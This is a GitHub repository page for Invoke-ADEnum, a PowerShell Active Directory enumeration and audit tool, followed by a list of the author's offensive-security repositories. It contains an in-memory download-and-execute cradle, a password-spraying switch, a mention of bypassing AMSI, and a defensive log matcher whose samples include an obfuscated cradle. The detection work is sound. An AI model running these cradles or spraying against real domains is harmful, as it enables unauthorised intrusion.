• Stars: 343
• Rank: 122,410 (Top 3 %)
• Language: PowerShell
• License: GNU General Publi...
• Created over 1 year ago
• Updated about 2 months ago


Repository Details

Automate Active Directory Enumeration

Invoke-ADEnum

Active Directory Enumeration

Invoke-ADEnum is an Active Directory enumeration tool designed to automate the process of gathering information from an Active Directory environment, leveraging the capabilities of PowerView.

With Invoke-ADEnum, you can quickly and efficiently enumerate various aspects of Active Directory, including forests, domains, trusts, domain controllers, users, groups, computers, shares, subnets, ACLs, OUs, GPOs, and more.

One of the features of Invoke-ADEnum is its ability to generate an Active Directory Audit Report in HTML format. Whether performing security assessments, compliance audits, or general Active Directory enumeration tasks, the report will provide a detailed overview of the Active Directory infrastructure, in an easy-to-navigate layout.

Invoke-ADEnum will generate a client-oriented report as well, which will include only relevant findings and list remediations/recommendations.

NOTE: By clicking on the tables' titles, you can generate and download a CSV version of the results. Additionally, you have the option to export the entire HTML report in XLSX format by clicking on "Active Directory Audit" at the top of the page. The XLSX export will include a separate sheet for each table of findings.


An offline version of the tool is also available, which won't load PowerView from the internet (useful against web filtering or lab scenarios).

Invoke-ADEnum is a tool for any IT professional working with Active Directory.

If you find Invoke-ADEnum valuable and use it in your work, please consider giving us a star on GitHub. Your support motivates the developer to continue improving and maintaining this project.

Usage

Load the script in memory:

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-ADEnum/main/Invoke-ADEnum.ps1')

For usage, please refer to the Help page:

Invoke-ADEnum -Help

Check your targets first, and make sure you stay in scope

Invoke-ADEnum -TargetsOnly

Recommended Coverage

Invoke-ADEnum -SecurityGroups -GPOsRights -LAPSReadRights -RBCD -AllGroups -SprayEmptyPasswords -UserCreatedObjects

+++> NOTE: If you use -CustomURL or -Local parameters you'll have to bypass AMSI manually <+++
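
For defenders, the commands in this Usage section leave recognizable text in PowerShell script block logging (Event ID 4104). The following is an added example, not code from the Invoke-ADEnum project: a Python matcher that flags the in-memory download cradle and the switches documented above. The function names are hypothetical, the sample strings are constructed, and the input is assumed to be the script block text exported from those events.

```python
import re

# Switches documented in the Usage section of this page.
SWITCHES = ("-targetsonly", "-securitygroups", "-gposrights", "-lapsreadrights",
            "-rbcd", "-allgroups", "-sprayemptypasswords",
            "-usercreatedobjects", "-customurl", "-local")

def normalize(script_text):
    """Lower-case and drop backticks, which PowerShell ignores before most letters."""
    return script_text.replace("`", "").lower()

def analyze(script_text):
    """Return indicator names found in one script block (hypothetical helper)."""
    text = normalize(script_text)
    findings = []
    runs_string = re.search(r"\b(iex|invoke-expression)\b", text)
    fetches = "net.webclient" in text and re.search(r"\.downloadstring\s*\(", text)
    # Order-independent: covers both the iex(...) form and the "... | iex" form.
    if runs_string and fetches:
        findings.append("download-cradle")
    if re.search(r"\binvoke-adenum\b", text):
        findings.append("tool-name")
        for switch in SWITCHES:
            # Anchored so "-local" does not match a longer parameter name.
            if re.search(r"(?<![\w-])" + re.escape(switch) + r"\b", text):
                findings.append("switch:" + switch)
    return findings

# Constructed script block samples; the first two are the page's own commands.
SAMPLES = [
    "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-ADEnum/main/Invoke-ADEnum.ps1')",
    "Invoke-ADEnum -SecurityGroups -GPOsRights -LAPSReadRights -RBCD -AllGroups -SprayEmptyPasswords -UserCreatedObjects",
    "IE`X (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')",
    "Get-ADUser -Filter * -Properties LastLogonDate",
]

def triage(samples):
    """Pair a short prefix of each sample with its findings."""
    return [(s[:40], analyze(s)) for s in samples]

if __name__ == "__main__":
    for snippet, hits in triage(SAMPLES):
        print(f"{snippet!r:45} -> {hits or 'clean'}")
```
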


Disclaimer

Invoke-ADEnum is intended exclusively for research, education, and authorized testing. Its purpose is to assist professionals and researchers in identifying vulnerabilities and enhancing system security.

Users must secure explicit, mutual consent from all parties involved before utilizing this tool on any system, network, or digital environment, as unauthorized activities can lead to serious legal consequences. Users are responsible for adhering to all applicable laws and regulations related to cybersecurity and digital access.

The creator of Invoke-ADEnum disclaims liability for any misuse or illicit use of the tool and is not responsible for any resulting damages or losses.

More Repositories

1. Amnesiac (PowerShell, 313 stars): Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with lateral movement within Active Directory environments
2. Invoke-SessionHunter (PowerShell, 117 stars): Retrieve and display information about active user sessions on remote computers. No admin privileges required.
3. SessionExec (PowerShell, 43 stars): Execute commands in other Sessions
4. Invoke-SMBRemoting (PowerShell, 32 stars): Interactive Shell and Command Execution over Named-Pipes (SMB)
5. Practical_Ethical_Hacking_Mindmap (10 stars): PenTest guide reference including tools and some commands
6. KeyCredentialLink (PowerShell, 8 stars): Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute
7. Invoke-WMIRemoting (PowerShell, 8 stars): Command Execution or Pseudo-Shell over WMI
8. Find-LocalAdminAccess (PowerShell, 8 stars): Check the Domain for Local Admin Access
9. Invoke-RunAsSystem (PowerShell, 8 stars): A simple script to elevate current session to SYSTEM (needs to be run as Administrator)
10. JRecon (PowerShell, 7 stars): A tool to automate Active Directory Enumeration
11. Tools (PowerShell, 7 stars)
12. Invoke-ShareHunter (PowerShell, 7 stars): Enumerate the Domain for Readable and Writable Shares
13. CheckSMBSigning (PowerShell, 6 stars): Checks for SMB signing disabled on all hosts in the network
14. PassSpray (PowerShell, 6 stars): Domain Password Spray
15. Token-Impersonation (PowerShell, 6 stars): Make or Steal a Token
16. JMove (PowerShell, 4 stars): Lateral Movement within Windows environments
17. Invoke-GrabTheHash (PowerShell, 4 stars): Get the NTLM Hash for the User or Machine Account TGT held in your current session
18. Invoke-s4u2self (PowerShell, 4 stars): A tool that abuses s4u2self to gain access to remote hosts
19. Invoke-ShadowHunter (PowerShell, 4 stars): Automate accounts takeover by abusing GenericWrite/GenericAll rights to add Shadow Credentials
20. JBreach (PowerShell, 3 stars)
21. CredsManager (HTML, 3 stars): A tool designed for efficient organisation and secure storage of credentials gathered during penetration tests
22. Collect-ADObjects (PowerShell, 2 stars): Collect Active Directory Objects
23. CheckWebDAVStatus (PowerShell, 2 stars): Checks for WebDAV Service Status Enabled on all hosts in the network
24. Validate-Credentials (PowerShell, 2 stars): Validate Domain Credentials
25. TGT_Monitor (PowerShell, 2 stars): Monitor for TGTs
26. Set-DomainObject (PowerShell, 1 star): Modify or clear a property for a specified active directory object
27. Get-DNSRecords (PowerShell, 1 star): Queries DNS records from the Active Directory domain, specifically from the DNS zones stored in the Active Directory.
28. ShellGen (PowerShell, 1 star): PowerShell script to generate ShellCode in various formats
29. File-Server (PowerShell, 1 star): A simple TCP file server